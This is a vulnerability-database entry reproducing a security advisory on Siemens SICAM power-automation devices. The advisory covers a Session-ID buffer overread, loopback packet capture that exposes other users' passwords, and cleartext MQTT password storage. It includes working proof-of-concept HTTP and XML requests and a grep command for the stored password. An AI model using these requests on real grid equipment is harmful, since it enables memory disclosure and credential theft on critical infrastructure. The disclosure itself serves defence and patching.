var-202405-0174
Vulnerability from variot
A vulnerability has been identified in CPC80 Central Processing/Communication (All versions < V16.41), CPCI85 Central Processing/Communication (All versions < V5.30), CPCX26 Central Processing/Communication (All versions < V06.02), ETA4 Ethernet Interface IEC60870-5-104 (All versions < V10.46), ETA5 Ethernet Int. 1x100TX IEC61850 Ed.2 (All versions < V03.27), PCCX26 Ax 1703 PE, Contr, Communication Element (All versions < V06.05). The affected devices contain an improper null termination vulnerability while parsing a specific HTTP header. This could allow an attacker to execute code in the context of the current process or lead to denial of service condition. SICAM 8 Power automation platform is a universal, all-in-one hardware and software-based solution for all applications in the field of power supply. The SICAM A8000 RTU (Remote Terminal Unit) series is a modular device family for telecontrol and automation applications in all areas of energy supply. SICAM EGS (Enhanced Grid Sensor) is a gateway for local substations in distribution networks. SEC Consult Vulnerability Lab Security Advisory < 20240626-0 >
title: Multiple Vulnerabilities in Power Automation Products
product: Siemens CP-8000/CP-8021/CP8-022/CP-8031/CP-8050/SICORE
vulnerable version: CPC80 < V16.41 / CPCI85 < V5.30 / OPUPI0 < V5.30 / SICORE < V1.3.0 / CPCX26 < V06.02 for CP-2016 and PCCX26 < V06.05 for CP-2019 in SICAM AK3 / ETA4 < V10.46 and ETA5 < V03.27 for SM-2558 ins SICAM AK3, SICAM BC and SICAM TM fixed version: CPC80 V16.41 / CPCI85 V5.30 / OPUPI V5.30 / SICORE V1.3.0 / CPCX26 V06.02 / PCCX26 V06.05 / ETA4 V10.46 / ETA5 V03.27 CVE number: CVE-2024-31484, CVE-2024-31485, CVE-2024-31486 impact: high homepage: https://www.siemens.com/global/en/products/energy/energy-automation-and-smart-grid.html found: 2023-04-03 and 2024-01-12 by: Stefan Viehboeck (Office Vienna) Steffen Robertz (Office Vienna) Gerhard Hechenberger (Office Vienna) Constantin Schieber-Knoebl (Office Vienna) SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Eviden business
Europe | Asia
https://www.sec-consult.com
=======================================================================
Vendor description:
"We are a technology company focused on industry, infrastructure, transport, and healthcare. From more resource-efficient factories, resilient supply chains, and smarter buildings and grids, to cleaner and more comfortable transportation as well as advanced healthcare, we create technology with purpose adding real value for customers."
Source: https://new.siemens.com/global/en/company/about.html
Business recommendation:
The vendor provides a patch which should be installed immediately.
SEC Consult highly recommends to perform a thorough security review of the product conducted by security professionals to identify and resolve potential further security issues.
Vulnerability overview/description:
1) Buffer Overread (Only CP-8000/CP-8021/CP-8022/CP-8031/CP-8050/CPCX26/PCCX26/ETA4/ETA5, CVE-2024-31484) The webserver running on the CP-8050 and CP-8031 is vulnerable to a buffer overread vulnerability.
The value of the HTTP header "Session-ID" is processed and used in a "strncpy" call without proper termination. Thus, data structures from the BSS segment will be leaked in the response. Attackers might be able to read sensitive data from memory.
2) Privilege Escalation (Only CP-8031/CP-8050 and SICORE devices, CVE-2024-31485) An attacker with an account with the viewer (or higher) role can intercept unencrypted traffic of other users of the web interface. Thus, the attacker can intercept higher privileged user accounts and passwords and might gain access to their accounts to perform tasks with elevated privileges.
3) Unsafe Storage of MQTT Client Passwords (Only CP-8031/CP-8050, CVE-2024-31486) A PLC with the OPUPI0 MQTT application installed is able to connect to an MQTT server. The configured MQTT password for the server is stored in cleartext on the device and can be read by exploiting a potential code execution or file disclosure vulnerability or with physical access to the device.
Proof of concept:
1) Buffer Overread (Only CP-8000/CP-8021/CP-8022/CP-8031/CP-8050/CPCX26/PCCX26/ETA4/ETA5, CVE-2024-31484) The buffer overread can be triggered by sending a "Session-ID" in the HTTP request header with exactly 20 bytes. This can be done with e.g. this request:
POST /SICAM_TOOLBOX_1703_remote_connection_00.htm HTTP/1.1 User-Agent: SICAM TOOLBOX II Version: 1 Session-ID: 3814280BA9921c6cAAAA Sequence-ID: 1 Content-Length: 8 Content-Type: text/plain KeepAlive: 5 Connection: close type=3
The server answers with following response:
HTTP/1.1 200 OK Server: SICAM 1703 Version: 1 Session-ID: 3814280BA9921c6cAAAAæk¤ Cache-Control: max-age=0, private X-Frame-Options: sameorigin Strict-Transport-Security: max-age=31536000; includeSubdomains Content-Security-Policy: default-src 'self' data: blob: 'unsafe-inline' 'unsafe-eval' X-XSS-Protection: 1; mode=block X-Permitted-Cross-Domain-Policies: none Content-Length: 71 Connection: close Date: Wed, 30 Mar 2022 01:38:37 GMT
Sequence-ID: 1 Content-Type: text/plain Content-Length: 8
type=4
The Session-ID in the response leaks at least 4 additional bytes. Further, the structure of the response is broken, as some HTTP headers are suddenly part of the body.
The vulnerability most likely stems from a misuse of the strncpy function. The following code segment was analyzed (RTUM85.elf, Offset 0x1d50de):
ptr_fcgi_header = get_fcgi_param(fcgi_struct, "HTTP_SESSION_ID); if (ptr_fcgi_header == (char*) 0x00) goto LAB_001d4a66; if ( is_a_session_available == 0 ) { strncpy(&session_id, ptr_fcgi_header, 0x14); }
strncpy is called with a length parameter of 0x14. To trigger the vulnerability, we are sending exactly 0x14 bytes. Thus, we believe that the global session_id variable is never properly terminated with a Null-pointer.
libc's documentation even contains a warning for this case: "If there is no null byte among the first n bytes of src, the string placed in dest will not be null-terminated."
Thus, if the response is built, every data structure in BSS following the session_id global will be printed as string until a Null byte is encountered.
2) Privilege Escalation (Only CP-8031/CP-8050 and SICORE devices, CVE-2024-31485) An attacker with an account with the viewer (or higher) role can intercept unencrypted traffic of other users of the web interface. Thus, the attacker can intercept higher privileged user accounts and passwords.
By starting the Ethernet Packet Capture (Home -> Monitoring & Simulation -> Ethernet Packet Capture), a request is sent. This request can be modified by an interceptor proxy (e.g. Burp Suite).
POST /sicweb-ajax/rtum85/cview HTTP/1.1 Host: HOST User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/xml SICWEB-SID: xNG1v825qFmCMo8hpjfISlVARKipW1B+lz9d5FoBxipR87VT Content-Length: 198 Origin: http:// HOST Connection: close Referer: http:// HOST/
The attacker can then send the parameter id p0 to the value "lo" and start the packet capture in order to dump from the loopback interface. It is a valid interface, as it only consist of lowercase characters and numbers (fix for CVE-2023-33919).
However, the webserver implements TLS in a stunnel fashion. It accepts all TLS traffic on port 443, then decrypts it and forwards it via loopback interface to port 80. By being able to read the loopback traffic, an attacker can now see all communication, including passwords of higher privileged users.
3) Unsafe Storage of MQTT Passwords (Only CP-8031/CP-8050, CVE-2024-31486) To demonstrate the issue, the following parameters were set for the MQTT client using the Siemens Toolbox II: * "8 MQTT password" mqtt_pw_sectest * "9 MQTT username" mqtt_sectest
The password (together with the username) can be located in the /ies/data/local/system/iescfg.iar file on the device, which can be retrieved by shell access/code execution on the device or by desoldering and reading its unencrypted flash memory chip:
grep -rain "mqtt_pw_sectest" /ies/data/local/system/iescfg.iar [...] mqtt mqtt_sectest. mqtt_pw_sectest. < �MQTT_Broker [...]
Vulnerable / tested versions:
The following version has been tested which was the latest version available at the time of the test:
Vulnerability 1 and 2 were confirmed on Siemens SICAM A8000 CP-8031 V05.12 Vulnerability 3 was confirmed on Siemens A8000 CP-8050 V04.92
Vendor contact timeline:
2023-04-18: Contacting vendor through productcert@siemens.com for vulnerability 3 2023-04-19: Advisory will be handled as case #92461. 2023-06-13: Siemens releases advisory for other vulnerabilities, see https://sec-consult.com/vulnerability-lab/advisory/multiple-vulnerabilities-siemens-a8000/ 2023-10-09: Requesting status update 2024-04-03: Requesting status update. 2024-04-04: Unsafe Storage of MQTT password: fix will be released in April 2024, Siemens advisory scheduled for May 2024 2024-04-11: Contacting vendor through productcert@siemens.com for Vulnerability 1 and 2 2024-04-12: Siemens assigned case #68662 for Vulnerability 1,2 2024-05-14: Siemens publishes SSA-871704 for vulnerability 1,2,3 2024-06-11: Siemens publishes SSA-620338 for Vulnerability 1 2024-06-26: Public release of advisory
Solution:
The vendor provides a patch which can be downloaded at the following URLs depending on the affected device:
CPC80 Central Processing/Communication: The firmware CPC80 V16.41 is present within “CP-8000/CP-8021/CP-8022 Package” V16.41 https://support.industry.siemens.com/cs/ww/en/view/109812178/
CPCI85 Central Processing/Communication: The firmware CPCI85 V5.30 is present within "CP-8031/CP-8050 Package" V5.30 https://support.industry.siemens.com/cs/ww/en/view/109804985/
SICORE Base system: The firmware SICORE V1.3.0 is present within "SICAM 8 Software Solution Package" V5.30 https://support.industry.siemens.com/cs/ww/en/view/109818240/
OPUPI0 AMQP/MQTT: The firmware OPUPI0 V5.30 is present within "CP-8031/CP-8050 Package" V5.30 https://support.industry.siemens.com/cs/ww/en/view/109804985/
CPCX26 Central Processing/Communication: The firmware CPCX26 V06.02 is present within “SICAM RTUs AK3 Package” V06.02 https://support.industry.siemens.com/cs/ww/en/view/109813252/
PCCX26 Ax 1703 PE, Contr, Communication Element: The firmware PCCX26 V06.05 is present within “SICAM RTUs AK3 Package” V06.02 https://support.industry.siemens.com/cs/ww/en/view/109813252/
ETA4 Ethernet Interface IEC60870-5-104: The firmware ETA4 V10.46 is present within “SICAM RTUs AK3 Package” V06.02 https://support.industry.siemens.com/cs/ww/en/view/109813252/
ETA5 Ethernet Int. 1x100TX IEC61850 Ed.2: The firmware ETA5 V03.27 is present within “SICAM RTUs AK3 Package” V06.02 https://support.industry.siemens.com/cs/ww/en/view/109813252/
Additional information from the vendor can be found in their advisories: https://cert-portal.siemens.com/productcert/html/ssa-871704.html https://cert-portal.siemens.com/productcert/html/ssa-620338.html
Workaround:
Limit network and physical access to the PLC.
Advisory URL:
https://sec-consult.com/vulnerability-lab/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia
About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Eviden business. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/
Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: security-research at sec-consult dot com Web: https://www.sec-consult.com Blog: https://blog.sec-consult.com Twitter: https://twitter.com/sec_consult
EOF Stefan Viehboeck, Steffen Robertz, Gerhard Hechenberger, Constantin Schieber-Knoebl / @2024
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-202405-0174", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "cpci85 central processing/communication", "scope": "lt", "trust": 0.6, "vendor": "siemens", "version": "v5.30" }, { "model": "cpc80 central processing/communication", "scope": "lt", "trust": 0.6, "vendor": "siemens", "version": "v16.41" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2024-23525" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Gerhard Hechenberger, Steffen Robertz, Constantin Schieber-Knoebl, Stefan Viehbock", "sources": [ { "db": "PACKETSTORM", "id": "179354" } ], "trust": 0.1 }, "cve": "CVE-2024-31484", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "COMPLETE", "baseScore": 7.2, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 3.9, "id": "CNVD-2024-23525", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "LOCAL", "author": "productcert@siemens.com", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 1.8, "id": "CVE-2024-31484", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" } ], "severity": [ { "author": "productcert@siemens.com", "id": "CVE-2024-31484", "trust": 1.0, "value": "High" }, { "author": "CNVD", "id": "CNVD-2024-23525", "trust": 0.6, "value": "HIGH" } ] } ], "sources": [ { "db": "CNVD", "id": "CNVD-2024-23525" }, { "db": "NVD", "id": "CVE-2024-31484" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "A vulnerability has been identified in CPC80 Central Processing/Communication (All versions \u003c V16.41), CPCI85 Central Processing/Communication (All versions \u003c V5.30), CPCX26 Central Processing/Communication (All versions \u003c V06.02), ETA4 Ethernet Interface IEC60870-5-104 (All versions \u003c V10.46), ETA5 Ethernet Int. 1x100TX IEC61850 Ed.2 (All versions \u003c V03.27), PCCX26 Ax 1703 PE, Contr, Communication Element (All versions \u003c V06.05). The affected devices contain an improper null termination vulnerability while parsing a specific HTTP header. This could allow an attacker to execute code in the context of the current process or lead to denial of service condition. SICAM 8 Power automation platform is a universal, all-in-one hardware and software-based solution for all applications in the field of power supply. The SICAM A8000 RTU (Remote Terminal Unit) series is a modular device family for telecontrol and automation applications in all areas of energy supply. SICAM EGS (Enhanced Grid Sensor) is a gateway for local substations in distribution networks. SEC Consult Vulnerability Lab Security Advisory \u003c 20240626-0 \u003e\n=======================================================================\n title: Multiple Vulnerabilities in Power Automation Products\n product: Siemens CP-8000/CP-8021/CP8-022/CP-8031/CP-8050/SICORE\n vulnerable version: CPC80 \u003c V16.41 / CPCI85 \u003c V5.30 / OPUPI0 \u003c V5.30 / SICORE \u003c V1.3.0 /\n CPCX26 \u003c V06.02 for CP-2016 and PCCX26 \u003c V06.05 for CP-2019 in SICAM AK3 /\n ETA4 \u003c V10.46 and ETA5 \u003c V03.27 for SM-2558 ins SICAM AK3, SICAM BC and SICAM TM\n fixed version: CPC80 V16.41 / CPCI85 V5.30 / OPUPI V5.30 / SICORE V1.3.0 / CPCX26 V06.02 /\n PCCX26 V06.05 / ETA4 V10.46 / ETA5 V03.27\n CVE number: CVE-2024-31484, CVE-2024-31485, CVE-2024-31486\n impact: high\n homepage: https://www.siemens.com/global/en/products/energy/energy-automation-and-smart-grid.html\n found: 2023-04-03 and 2024-01-12\n by: Stefan Viehboeck (Office Vienna)\n Steffen Robertz (Office Vienna)\n Gerhard Hechenberger (Office Vienna)\n Constantin Schieber-Knoebl (Office Vienna)\n SEC Consult Vulnerability Lab\n\n An integrated part of SEC Consult, an Eviden business\n Europe | Asia\n\n https://www.sec-consult.com\n\n=======================================================================\n\nVendor description:\n-------------------\n\"We are a technology company focused on industry, infrastructure,\ntransport, and healthcare. From more resource-efficient factories,\nresilient supply chains, and smarter buildings and grids, to cleaner\nand more comfortable transportation as well as advanced healthcare,\nwe create technology with purpose adding real value for customers.\"\n\nSource: https://new.siemens.com/global/en/company/about.html\n\nBusiness recommendation:\n------------------------\nThe vendor provides a patch which should be installed immediately. \n\nSEC Consult highly recommends to perform a thorough security review of the product\nconducted by security professionals to identify and resolve potential further\nsecurity issues. \n\n\nVulnerability overview/description:\n-----------------------------------\n1) Buffer Overread (Only CP-8000/CP-8021/CP-8022/CP-8031/CP-8050/CPCX26/PCCX26/ETA4/ETA5, CVE-2024-31484)\nThe webserver running on the CP-8050 and CP-8031 is vulnerable to a buffer overread\nvulnerability. \n\nThe value of the HTTP header \"Session-ID\" is processed and used in a \"strncpy\" call\nwithout proper termination. Thus, data structures from the BSS segment will be\nleaked in the response. Attackers might be able to read sensitive data from memory. \n\n\n2) Privilege Escalation (Only CP-8031/CP-8050 and SICORE devices, CVE-2024-31485)\nAn attacker with an account with the viewer (or higher) role can intercept unencrypted\ntraffic of other users of the web interface. Thus, the attacker can intercept higher\nprivileged user accounts and passwords and might gain access to their accounts to\nperform tasks with elevated privileges. \n\n\n3) Unsafe Storage of MQTT Client Passwords (Only CP-8031/CP-8050, CVE-2024-31486)\nA PLC with the OPUPI0 MQTT application installed is able to connect to\nan MQTT server. The configured MQTT password for the server is stored\nin cleartext on the device and can be read by exploiting a potential\ncode execution or file disclosure vulnerability or with physical access\nto the device. \n\n\nProof of concept:\n-----------------\n1) Buffer Overread (Only CP-8000/CP-8021/CP-8022/CP-8031/CP-8050/CPCX26/PCCX26/ETA4/ETA5, CVE-2024-31484)\nThe buffer overread can be triggered by sending a \"Session-ID\" in the HTTP request header\nwith exactly 20 bytes. This can be done with e.g. this request:\n\nPOST /SICAM_TOOLBOX_1703_remote_connection_00.htm HTTP/1.1\nUser-Agent: SICAM TOOLBOX II\nVersion: 1\nSession-ID: 3814280BA9921c6cAAAA\nSequence-ID: 1\nContent-Length: 8\nContent-Type: text/plain\nKeepAlive: 5\nConnection: close\ntype=3\n\nThe server answers with following response:\n\nHTTP/1.1 200 OK\nServer: SICAM 1703\nVersion: 1\nSession-ID: 3814280BA9921c6cAAAA\u00e6k\u00a4\nCache-Control: max-age=0, private\nX-Frame-Options: sameorigin\nStrict-Transport-Security: max-age=31536000; includeSubdomains\nContent-Security-Policy: default-src \u0027self\u0027 data: blob: \u0027unsafe-inline\u0027 \u0027unsafe-eval\u0027\nX-XSS-Protection: 1; mode=block\nX-Permitted-Cross-Domain-Policies: none\nContent-Length: 71\nConnection: close\nDate: Wed, 30 Mar 2022 01:38:37 GMT\n\nSequence-ID: 1\nContent-Type: text/plain\nContent-Length: 8\n\ntype=4\n\n\nThe Session-ID in the response leaks at least 4 additional bytes. Further,\nthe structure of the response is broken, as some HTTP headers are suddenly part\nof the body. \n\nThe vulnerability most likely stems from a misuse of the strncpy function. \nThe following code segment was analyzed (RTUM85.elf, Offset 0x1d50de):\n\nptr_fcgi_header = get_fcgi_param(fcgi_struct, \"HTTP_SESSION_ID);\nif (ptr_fcgi_header == (char*) 0x00) goto LAB_001d4a66;\nif ( is_a_session_available == 0 ) {\n strncpy(\u0026session_id, ptr_fcgi_header, 0x14);\n}\n\nstrncpy is called with a length parameter of 0x14. To trigger the vulnerability,\nwe are sending exactly 0x14 bytes. Thus, we believe that the global session_id\nvariable is never properly terminated with a Null-pointer. \n\nlibc\u0027s documentation even contains a warning for this case:\n\"If there is no null byte among the first n bytes of src, the string\nplaced in dest will not be null-terminated.\"\n\nThus, if the response is built, every data structure in BSS following the\nsession_id global will be printed as string until a Null byte is encountered. \n\n\n2) Privilege Escalation (Only CP-8031/CP-8050 and SICORE devices, CVE-2024-31485)\nAn attacker with an account with the viewer (or higher) role can intercept unencrypted\ntraffic of other users of the web interface. Thus, the attacker can intercept higher\nprivileged user accounts and passwords. \n\nBy starting the Ethernet Packet Capture (Home -\u003e Monitoring \u0026 Simulation -\u003e Ethernet\nPacket Capture), a request is sent. This request can be modified by an interceptor\nproxy (e.g. Burp Suite). \n\nPOST /sicweb-ajax/rtum85/cview HTTP/1.1\nHost: HOST\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/xml\nSICWEB-SID: xNG1v825qFmCMo8hpjfISlVARKipW1B+lz9d5FoBxipR87VT\nContent-Length: 198\nOrigin: http:// HOST\nConnection: close\nReferer: http:// HOST/\n\n\u003c?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\n\u003cCmd_SetCustomViewValue\u003e\u003cview id=\"packet_capture\"\u003e\u003cparameter id=\"p0\"\u003e\n\u003cvalue\u003elo\u003c/value\u003e\n\u003c/parameter\u003e\u003c/view\u003e\u003c/Cmd_SetCustomViewValue\u003e\n\n\nThe attacker can then send the parameter id p0 to the value \"lo\" and start the\npacket capture in order to dump from the loopback interface. It is a valid\ninterface, as it only consist of lowercase characters and numbers (fix\nfor CVE-2023-33919). \n\nHowever, the webserver implements TLS in a stunnel fashion. It accepts all\nTLS traffic on port 443, then decrypts it and forwards it via loopback interface\nto port 80. By being able to read the loopback traffic, an attacker can now\nsee all communication, including passwords of higher privileged users. \n\n\n3) Unsafe Storage of MQTT Passwords (Only CP-8031/CP-8050, CVE-2024-31486)\nTo demonstrate the issue, the following parameters were set for the MQTT client\nusing the Siemens Toolbox II:\n* \"8 MQTT password\" mqtt_pw_sectest\n* \"9 MQTT username\" mqtt_sectest\n\nThe password (together with the username) can be located in the\n/ies/data/local/system/iescfg.iar file on the device, which can be\nretrieved by shell access/code execution on the device or by desoldering\nand reading its unencrypted flash memory chip:\n-----------------------------------------------------------------------\ngrep -rain \"mqtt_pw_sectest\" /ies/data/local/system/iescfg.iar\n[...]\nmqtt\nmqtt_sectest. \nmqtt_pw_sectest. \n\u003c \ufffdMQTT_Broker\n[...]\n-----------------------------------------------------------------------\n\n\nVulnerable / tested versions:\n-----------------------------\nThe following version has been tested which was the latest version available\nat the time of the test:\n\nVulnerability 1 and 2 were confirmed on Siemens SICAM A8000 CP-8031 V05.12\nVulnerability 3 was confirmed on Siemens A8000 CP-8050 V04.92\n\n\nVendor contact timeline:\n------------------------\n2023-04-18: Contacting vendor through productcert@siemens.com for vulnerability 3\n2023-04-19: Advisory will be handled as case #92461. \n2023-06-13: Siemens releases advisory for other vulnerabilities, see https://sec-consult.com/vulnerability-lab/advisory/multiple-vulnerabilities-siemens-a8000/\n2023-10-09: Requesting status update\n2024-04-03: Requesting status update. \n2024-04-04: Unsafe Storage of MQTT password: fix will be released in April 2024,\n Siemens advisory scheduled for May 2024\n2024-04-11: Contacting vendor through productcert@siemens.com for Vulnerability 1 and 2\n2024-04-12: Siemens assigned case #68662 for Vulnerability 1,2\n2024-05-14: Siemens publishes SSA-871704 for vulnerability 1,2,3\n2024-06-11: Siemens publishes SSA-620338 for Vulnerability 1\n2024-06-26: Public release of advisory\n\n\nSolution:\n---------\nThe vendor provides a patch which can be downloaded at the following URLs\ndepending on the affected device:\n\nCPC80 Central Processing/Communication: The firmware CPC80 V16.41 is present within \u201cCP-8000/CP-8021/CP-8022 Package\u201d V16.41\nhttps://support.industry.siemens.com/cs/ww/en/view/109812178/\n\nCPCI85 Central Processing/Communication: The firmware CPCI85 V5.30 is present within \"CP-8031/CP-8050 Package\" V5.30\nhttps://support.industry.siemens.com/cs/ww/en/view/109804985/\n\nSICORE Base system: The firmware SICORE V1.3.0 is present within \"SICAM 8 Software Solution Package\" V5.30\nhttps://support.industry.siemens.com/cs/ww/en/view/109818240/\n\nOPUPI0 AMQP/MQTT: The firmware OPUPI0 V5.30 is present within \"CP-8031/CP-8050 Package\" V5.30\nhttps://support.industry.siemens.com/cs/ww/en/view/109804985/\n\nCPCX26 Central Processing/Communication: The firmware CPCX26 V06.02 is present within \u201cSICAM RTUs AK3 Package\u201d V06.02\nhttps://support.industry.siemens.com/cs/ww/en/view/109813252/\n\nPCCX26 Ax 1703 PE, Contr, Communication Element: The firmware PCCX26 V06.05 is present within \u201cSICAM RTUs AK3 Package\u201d V06.02\nhttps://support.industry.siemens.com/cs/ww/en/view/109813252/\n\nETA4 Ethernet Interface IEC60870-5-104: The firmware ETA4 V10.46 is present within \u201cSICAM RTUs AK3 Package\u201d V06.02\nhttps://support.industry.siemens.com/cs/ww/en/view/109813252/\n\nETA5 Ethernet Int. 1x100TX IEC61850 Ed.2: The firmware ETA5 V03.27 is present within \u201cSICAM RTUs AK3 Package\u201d V06.02\nhttps://support.industry.siemens.com/cs/ww/en/view/109813252/\n\nAdditional information from the vendor can be found in their advisories:\nhttps://cert-portal.siemens.com/productcert/html/ssa-871704.html\nhttps://cert-portal.siemens.com/productcert/html/ssa-620338.html\n\n\nWorkaround:\n-----------\nLimit network and physical access to the PLC. \n\n\nAdvisory URL:\n-------------\nhttps://sec-consult.com/vulnerability-lab/\n\n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nSEC Consult Vulnerability Lab\nAn integrated part of SEC Consult, an Eviden business\nEurope | Asia\n\nAbout SEC Consult Vulnerability Lab\nThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an\nEviden business. It ensures the continued knowledge gain of SEC Consult in the\nfield of network and application security to stay ahead of the attacker. The\nSEC Consult Vulnerability Lab supports high-quality penetration testing and\nthe evaluation of new offensive and defensive technologies for our customers. \nHence our customers obtain the most current information about vulnerabilities\nand valid recommendation about the risk profile of new technologies. \n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nInterested to work with the experts of SEC Consult?\nSend us your application https://sec-consult.com/career/\n\nInterested in improving your cyber security with the experts of SEC Consult?\nContact our local offices https://sec-consult.com/contact/\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nMail: security-research at sec-consult dot com\nWeb: https://www.sec-consult.com\nBlog: https://blog.sec-consult.com\nTwitter: https://twitter.com/sec_consult\n\nEOF Stefan Viehboeck, Steffen Robertz, Gerhard Hechenberger, Constantin Schieber-Knoebl / @2024\n", "sources": [ { "db": "NVD", "id": "CVE-2024-31484" }, { "db": "CNVD", "id": "CNVD-2024-23525" }, { "db": "PACKETSTORM", "id": "179354" } ], "trust": 1.53 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "SIEMENS", "id": "SSA-871704", "trust": 1.7 }, { "db": "NVD", "id": "CVE-2024-31484", "trust": 1.7 }, { "db": "SIEMENS", "id": "SSA-620338", "trust": 1.1 }, { "db": "CNVD", "id": "CNVD-2024-23525", "trust": 0.6 }, { "db": "PACKETSTORM", "id": "179354", "trust": 0.1 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2024-23525" }, { "db": "PACKETSTORM", "id": "179354" }, { "db": "NVD", "id": "CVE-2024-31484" } ] }, "id": "VAR-202405-0174", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "CNVD", "id": "CNVD-2024-23525" } ], "trust": 0.06 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.6 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2024-23525" } ] }, "last_update_date": "2024-11-28T22:59:49.924000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": 